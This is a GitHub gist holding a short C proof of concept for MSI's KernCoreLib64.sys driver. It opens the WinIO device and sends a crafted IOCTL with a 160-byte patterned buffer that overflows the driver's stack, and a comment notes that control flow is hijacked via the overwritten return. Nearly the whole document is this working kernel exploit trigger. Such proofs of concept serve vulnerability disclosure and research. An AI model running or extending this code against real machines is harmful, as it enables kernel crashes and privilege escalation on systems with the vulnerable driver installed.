Last active
October 7, 2022 17:38
-
-
Save alfarom256/04d3e7ddc3c66da6cddac670d79cd446 to your computer and use it in GitHub Desktop.
MSI KernCoreLib64.sys PoC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <stdio.h> | |
| #define GLE( x ) { printf("%s failed with error: %d\n", x , GetLastError()); } | |
| #define IOCTL_TRIGGER_OVERFLOW 0x80102040 | |
| DWORD64 genPattern(BYTE b) { | |
| DWORD64 retVal = b; | |
| retVal |= retVal << 8; | |
| retVal |= retVal << 16; | |
| retVal |= retVal << 32; | |
| return retVal; | |
| } | |
| int main() { | |
| DWORD dwBytesReturned = 0; | |
| DWORD64 dummy = 0; | |
| DWORD64 overflow[20]; | |
| for (int i = 0; i < 20; i++) { | |
| overflow[i] = genPattern('A' + i); | |
| // control flow hijacked with return to overflow[5] | |
| } | |
| const char* strDevName = R"(\\.\WinIO)"; | |
| puts("Opening device"); | |
| HANDLE hDevice = CreateFileA(strDevName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); | |
| if (hDevice == (HANDLE)0 || hDevice == INVALID_HANDLE_VALUE) { | |
| GLE("CreateFileA"); | |
| return -1; | |
| } | |
| NTSTATUS status = DeviceIoControl( | |
| hDevice, | |
| IOCTL_TRIGGER_OVERFLOW, | |
| &overflow[0], | |
| sizeof(DWORD64) * 20, | |
| &dummy, | |
| sizeof(dummy), | |
| &dwBytesReturned, | |
| NULL | |
| ); | |
| return 0; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment